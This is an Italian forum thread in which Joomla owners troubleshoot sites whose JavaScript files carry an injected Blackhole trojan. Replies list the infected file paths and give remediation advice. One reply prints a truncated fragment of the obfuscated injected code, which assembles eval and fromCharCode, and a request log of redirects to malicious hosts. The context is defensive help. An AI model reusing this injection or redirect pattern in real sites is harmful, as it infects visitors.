Pagina di login amministrazione completamente bianca

[Giò sdrega]

Ciao a tutti,

sono un nuovo utente nel forum e soprattutto non sono un programmatore ho solo qualche piccola nozione che mi ha permesso di mettere su il sito. Ringrazio anticipatamente chi di voi saprà darmi una mano.

Ho creato qualche mese fa un sito con J 1.7.1. Ieri inserendo l'indirizzo www.miosito.it/administrator mi è scattato l'antivirus Avast avvisandomi che c'era un trojan Blackhole nel percorso htdoc/media/js/core.js e mi ha dato la pagina di login completamente bianca.

Ho fatto qualche prova ho sostituito da locale via FTP il file core, ma niente non so cosa fare per ripristinare il tutto. C'è da considerare che il sito funziona e si vede. il problema è venuto fuori perchè andando ad aggiornare dal frontend c'era l'icona di blocco (lucchetto) che dovevo sbloccare.

Ringrazio ancora chi di voi di buona volontà saprà darmi una mano.

Attendo

[giusebos]

magari queste informazioni possono tornarti utili:

Ho avuto anche io il tuo problema su un paio di siti, su uno praticamente c'era l'installazione vergine di joomla 2.5.4, nessun componente installato, nemmeno template extra, mentre nell'altro c'era k2, bt_slideshow, ed un template che fauso di librerie js, anche qui tutto aggiornato e stessa versione di joomla, sempre la 2.5.4.

nella seconda installazione i file infetti .js sono stati questi:

Codice: [Seleziona]

/modules/mod_btslideshow/assets/js/btloader.min.js
/components/com_k2/js/k2.js
/media/system/js/modal.js
/media/system/js/mootools-more-uncompressed.js
/media/system/js/mootools-more.js
/media/system/js/core.js
Per ripristinare non ho fatto altro che cancellarli e ripristinarli con delle versioni pulite.

Il primo sito a ripreso subito a funzionare, mentre il secondo, ha presentato solo un problema:
nel back-end tutti i tasti salva, salva e chiudi, chiudi, abilita disabilita, non funzionavano più.

Inoltre se selezionavo 3/4 articoli per disattivare la pubblicazione, un messaggio dei browser (provati tutti da ff opera IE chrome) mi avvertiva che nessun articolo, menù, categoria........, era stata selezionata. Non riuscivo nemeno a svuotare la cache del sito.

Ho provato pure a sovrascrivere joomla, ma non è servito, il problema si è presentato puntuale anche visitando il sito con un altro paio di computer.

Ho lasciato perdere perchè avevo da fare, poi oggi pensando di trovare un modo per risolvere, entro nel backend e come per magia tutto funzionava.......

Magari è un problema di cache del server, ma non saprei.

Mi piacerebbe sapere invece, come hanno fatto a scrivere codice malevolo in quei file....

[Giò sdrega]

Ciao Giusebos,

grazie 1000 intanto per la disponibilità. Bhe, il codice non so proprio come abbiano fatto a scriverlo, l'ultima operazione che ho fatto è stata quella di caricare simplecaddy per piccolo e-commerce scaricata dal sito uff.le. boh...

Ho provato a reinstallare in locale una copia di backup fatta con Akeeba , ma mi dà solo l'homepage e quando clicco su una voce di menù verifico che ha perso il collegamento. Nel backend riesco ad entrare e gli articoli li vedo, provo a ricollegarli dal link, ma nulla.... come mai? Sarà la mia poca esperienza di PHP e joomla?

provo a sostituire i file che mi hai detto con una versione pulita...

procedo e ti aggiorno,

grazie ancora

[Giò sdrega]

Niente Giusebos,

ho provato a sostituire tutta la cartella /media/sistem/js, ma nulla di fatto. anzi la situazione è peggiorata, in quanto adesso la minaccia di Avast è stata rilevata anche andando direttamente al sito che è www.paneeco.com.

cosa posso fare? C'è qualcuno che può darmi una mano?

Grazie ancora

[Giò sdrega]

Il sito scaricato in locale ed attivato con kickstart.php durante la fase di installazione del backup mi dava una delle voci in rosso e nello specifico "display errors yes".
Comunque procedo e mi dice una volta che carico la homepage

Parse error:  syntax error, unexpected $end in C:\xampp\htdocs\paneeco.com\modules\mod_nice_social_bookmark\mod_nice_social_bookmark.php on line 205

disinstallo il modulo in questione e mi fa vedere la homepage, ma mi ha perso i collegamenti, come dicevo precedentemente

Qualcuno ne sa qualcosa? Può darmi una mano?

Grazie ancora

[mau_develop]

stesso problema stesso attacker (probabilmente) del post dopo il tuo:

14:32:21.663[319ms][totale 319ms] Stato: 302[Moved Temporarily]
GET hxxp://qhibjmjlnpyovmbn.ru/runforestrun?sid=cx Azione[LOAD_DOCUMENT_URI  ] Dimensioni del contenuto[-1] Mime Type[text/html]
   Richiesta dell'intestazione:
      Host[qhibjmjlnpyovmbn.ru]
      User-Agent[Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[it-it,it;q=0.8,en-us;q=0.5,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      DNT[1]
      Connection[keep-alive]
      Referer[hxxp://www.paneeco.com/administrator/]
   Risposta dell'intestazione:
      X-Powered-By[Express]
      Set-Cookie[u_17062012=yes; expires=Mon, 18 Jun 2012 16:49:32 GMT; httpOnly]
      Content-Type[text/html]
      Location[hxxp://dihdiwehibaksljdbfl.ipq.co/feed/xml.php?uid=12]
      Connection[keep-alive]
      Transfer-Encoding[chunked]


14:32:22.001[501ms][totale 501ms] Stato: 200[OK]
GET hxxp://dihdiwehibaksljdbfl.ipq.co/feed/xml.php?uid=12 Azione[LOAD_DOCUMENT_URI  LOAD_REPLACE  ] Dimensioni del contenuto[-1] Mime Type[text/html]
   Richiesta dell'intestazione:
      Host[dihdiwehibaksljdbfl.ipq.co]
      User-Agent[Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[it-it,it;q=0.8,en-us;q=0.5,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      DNT[1]
      Connection[keep-alive]
      Referer[hxxp://www.paneeco.com/administrator/]
   Risposta dell'intestazione:
      Server[nginx]
      Date[Sun, 17 Jun 2012 12:32:22 GMT]
      Content-Type[text/html]
      Transfer-Encoding[chunked]
      Connection[keep-alive]
      X-Powered-By[PHP/5.3.13]
      Cache-Control[no-store, no-cache, must-revalidate]
      Content-Encoding[gzip]

Se qualcuno più curioso vuole capirne di più e rimanere aggiornato sulla distribuzione di malware:
http://blog.sucuri.net/2012/06/sucuri-sitecheck-web-malware-distribution-may-2012.html

Ma utilizzando il link site check verrà eseguito un test antimalware.

Questo il test del tuo sito, ma fallo perchè ti dice cose interessanti:

web site:    www.paneeco.com/administrator/
status:    Site with warnings
web trust:          Not Blacklisted

qs solo un pezzetto del malware:
Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwjs160

Codice: [Seleziona]

function tableOrdering(a,b,c){var d=document.adminForm;d.filter_order.value=a;d.filter_order_Dir.value=b;submitform(c)}function saveorder(a,b){checkAll_button(a,b)}function checkAll_button(a,b){b||(b="saveorder");for(var c=0;c<=a;c++){var d=document.adminForm["cb"+c];if(d){if(d.checked==!1)d.checked=!0}else{alert("You cannot change the order of items, as an item in the list is `Checked Out`");return}}submitform(b)};/*km0ae9gr6m*/try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{bcsd=prototype-2;}catch(bawg){ss=[];f=(h)?("fromCharC"+"ode"):"";e=window["e"+"val"];
Ti dice anche che è un malware conosciuto e ti dice di guardare al link boldato sopra dove credo troverai spiegazione di dove va a finire quel malware e cosa vuole e prob come rimuoverlo... può darsi non sia nel sito ma nel tuo pc con cui lo infetti.

M.

[Giò sdrega]

Grazie anche a te, mau_develop.

ho dovuto reinstallare con il backup fatto con Akeeba. Speriamo che tutto rimanga lo stesso e funzioni.

Secondo voi potrebbe anche essere stato infettato da un inserimento/aggiornamento di un articolo fatto da un'altro utente che non accede al backend?


Grazie

[mau_develop]

se non si sa come funziona il virus come si fa a dire?
... ho messo tutta quella spatafiata proprio per darti la possibilità di capirne di più ma non l'ho certo letto.

M.

[Giò sdrega]

Ho provato a leggere, ma le mie competenze tecniche sono basilari e non mi consentono di andare oltre certi limiti specifici.

Comunque le informazioni che mi evete dato sono state esaustive e mi hanno consentito di fare esperienze con situazioni nuove.

Grazie 1000, ancora

G

[mau_develop]

sostanzialmente..

- potresti avere virus nel / nei pc con cui amministri
soluzione: scansioni con almeno 2 antivirus con pc avviato in modalità provvisoria

- potresti avere dei componenti o joomla non all'ultima versione
soluzione: leggere il post in testa alla sezione e un po' di post in qs sezione (hanno tutti il medesimo problema)

- potresti non averne colpa ed essere il server vulnerabile; passando da altri siti arrivano al tuo
soluzione: comunicare con l'hoster ma presumibilmente la scelta migliore è cambiare hosting.

M.

[Giò sdrega]

Bene, procedo con i tuoi preziosi consigli!!! e verifico.

Grazie

G

[giusebos]

Mi hanno nuovamente sovrascritto i file elencati.
Se prendo questo buontempone, con la sua auto ci faccio i fuochi di artificio 

Codice: [Seleziona]

/modules/mod_btslideshow/assets/js/btloader.min.js
/components/com_k2/js/k2.js
/media/system/js/modal.js
/media/system/js/mootools-more-uncompressed.js
/media/system/js/mootools-more.js
/media/system/js/core.js

Controllando i log la prima volta non ho visto niente di anomalo....così prima di ripulire, per sicurezza ho cambiato tutte le password del caso.....anche se devo dire che la password era una cosa tipo

Codice: [Seleziona]

Hhgy78à55JJuU
Poi appena ho visto che avevo lo stesso problema, mi è venuta l'idea di controllare i siti che sono nello stesso server condiviso, così ho scoperto che:

Tutti i siti realizzati con joomla soffrono dello stesso problema.
siti realizzati con drupal e typo3, appena visitati non mi danno nessun alert da parte di avast.

Mi chiedo se è un problema del server, perchè magari malconfigurato, oppure qualche bug di joomla non ancora scoperto.

[mau_develop]

guarda se riesci a farlo anche tu ... a me la curiosità è venuta così...

M.

[giusebos]

Se riesco a fare cosa a sovrascrivere un file? No non sono cosi bravo.